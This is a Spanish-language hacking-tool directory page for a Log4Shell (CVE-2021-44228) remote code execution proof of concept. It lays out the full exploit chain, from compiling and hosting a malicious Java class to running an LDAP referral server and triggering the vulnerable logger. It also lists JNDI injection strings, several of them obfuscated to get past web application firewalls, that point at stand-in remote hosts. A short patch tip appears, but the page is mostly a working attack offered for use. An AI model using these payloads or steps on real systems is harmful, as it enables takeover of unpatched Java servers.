Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2021-44228 — Este exploit de Log4j RCE se originó de https://github.com/tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce | Kitploit
Herramientas/GitHubGitHub/roxas-tan/cve-2021-44228
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebEvasión de WAFHerramienta de Acceso Remoto
GitHubroxas-tan/cve-2021-44228

CVE-2021-44228

Este exploit de Log4j RCE se originó de https://github.com/tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce

Ver Repositorio
10711hace 4 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2021-44228 (Ejecución remota de código en Apache Log4j)

todas las versiones de log4j-core >=2.0-beta9 y <=2.14.1

La versión 1.x tiene otras vulnerabilidades; se recomienda actualizar a la última versión.

Avisos/boletines de seguridad relacionados con Log4Shell (CVE-2021-44228)

Uso:

Descargue este proyecto, compile el código del exploit blob/master/src/main/java/Exploit.java e inicie un servidor web para permitir la descarga del binario compilado.

root@kitploit:~
git clone https://github.com/roxas-tan/CVE-2021-44228.git
cd CVE-2021-44228

javac Exploit.java

# start webserver
# For Python2
python -m SimpleHTTPServer 8888
# For Python3
python3 -m http.server 8888

# make sure the python webserver is running in the same directory as Exploit.class, to test
  curl -I 127.0.0.1:8888/Exploit.class

Descargue otro proyecto y ejecute implementación de servidor LDAP que devuelve referencias JNDI* https://github.com/mbechler/marshalsec/blob/master/src/main/java/marshalsec/jndi/LDAPRefServer.java

root@kitploit:~
git clone https://github.com/mbechler/marshalsec.git cd marshalsec # Java 8 required mvn clean package -DskipTests java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8888/#Exploit"

Construya y ejecute el código de activación (simule un ataque log4j en un servidor web Java vulnerable) blob/master/src/main/java/log4j.java, y aparecerá la aplicación de calculadora.

root@kitploit:~
cd CVE-2021-44228
mvn clean package
java -cp target/log4j-rce-1.0-SNAPSHOT-all.jar log4j

# Expect the following
# 1. calculator app appears
# 2. in ldapserver console,
#  Send LDAP reference result for Exploit redirecting to http://127.0.0.1:8888/Exploit.class
# 3. in webserver console,
#  127.0.0.1 - - [....] "GET /Exploit.class HTTP/1.1" 200 -

Consejos:

No confíe en una versión actual de Java para salvarse. Actualice Log4j (o elimine la búsqueda JNDI). Desactive la expansión (parece una idea bastante mala de todas formas).

Bypass rc1

Por ejemplo:

root@kitploit:~
${jndi:ldap://127.0.0.1:1389/ badClassName}

Bypass WAF

root@kitploit:~
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc}
${${::-j}ndi:rmi://asdasd.asdasd.asdasd/ass}
${jndi:rmi://adsasd.asdasd.asdasd}
${${lower:jndi}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:${lower:jndi}}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://xxxxxxx.xx/poc}

No confíe en el firewall de aplicaciones web.

Detalles de la vulnerabilidad

Las búsquedas (Lookups) proporcionan una forma de agregar valores a la configuración de Log4j en lugares arbitrarios.

Lookups

Los métodos que causan fuga en finally

root@kitploit:~
LogManager.getLogger().error()
LogManager.getLogger().fatal()
Descargar herramienta